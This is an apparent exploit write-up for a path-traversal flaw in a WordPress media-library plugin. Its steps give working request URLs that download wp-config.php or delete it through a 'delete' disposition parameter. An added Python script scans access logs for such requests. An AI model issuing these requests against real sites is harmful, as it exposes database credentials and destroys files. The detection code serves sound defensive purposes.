1 - Log in as an administrator, editor, or author user.
2 - Access the URL: http://target/wp-admin/upload.php?page=mla-menu
3 - Capture the URL used to download a picture.
4 - Change and insert parameters in the captured URL and request it. Example:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=%2Fsrv%2Fwww%2Fwordpress-develop%2Fpublic_html%2Fsrc%2Fwp-content%2Fuploads%2Fstar-wars-5.jpg&mla_download_type=image/jpeg
To only download a file:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download
To delete a file:
http://target/wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download&mla_download_disposition=delete
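Added example, not part of the original write-up or the plugin's code: a check that scans web server access logs for requests shaped like the ones above. It assumes combined log format and that legitimate downloads point under /wp-content/uploads/ (as in the first example URL); the names inspect_request, scan and SAMPLE_LOG are illustrative.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined format) built from the URLs in the steps above.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:01 +0000] "GET /wp-admin/upload.php?page=mla-menu HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2020:10:00:09 +0000] "GET /wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=%2Fsrv%2Fwww%2Fwordpress-develop%2Fpublic_html%2Fsrc%2Fwp-content%2Fuploads%2Fstar-wars-5.jpg&mla_download_type=image/jpeg HTTP/1.1" 200 48211',
    '203.0.113.7 - - [01/Jan/2020:10:01:30 +0000] "GET /wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download HTTP/1.1" 200 3021',
    '203.0.113.7 - - [01/Jan/2020:10:02:11 +0000] "GET /wp-admin/upload.php?mla_admin_nonce=01dc26b197&page=mla-menu&mla_download_file=../wp-config.php&mla_download_type=application/force-download&mla_download_disposition=delete HTTP/1.1" 200 3021',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=5):
    # Undo repeated percent-encoding so the path is checked in its final form.
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def inspect_request(target, uploads_marker="/wp-content/uploads/"):
    """Return why a request to the MLA download handler looks abusive ([] if it does not).

    uploads_marker is an assumption about where legitimate media files live."""
    parts = urlsplit(target)
    query = parse_qs(parts.query, keep_blank_values=True)
    if not parts.path.endswith("/wp-admin/upload.php"):
        return []
    if query.get("page", [""])[0] != "mla-menu" or "mla_download_file" not in query:
        return []
    reasons = []
    path = fully_decode(query["mla_download_file"][0]).replace("\\", "/")
    if ".." in path.split("/"):
        reasons.append("path-traversal")
    if uploads_marker not in posixpath.normpath(path):
        reasons.append("outside-uploads")
    if "delete" in (v.lower() for v in query.get("mla_download_disposition", [])):
        reasons.append("delete-disposition")
    return reasons

def scan(lines):
    """Return (client address, reasons) for every flagged log line."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        reasons = inspect_request(match.group(1)) if match else []
        if reasons:
            findings.append((line.split()[0], reasons))
    return findings

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A delete-disposition hit means the targeted file may no longer exist on disk, so check for its presence and restore it from backup before rotating any secrets it held.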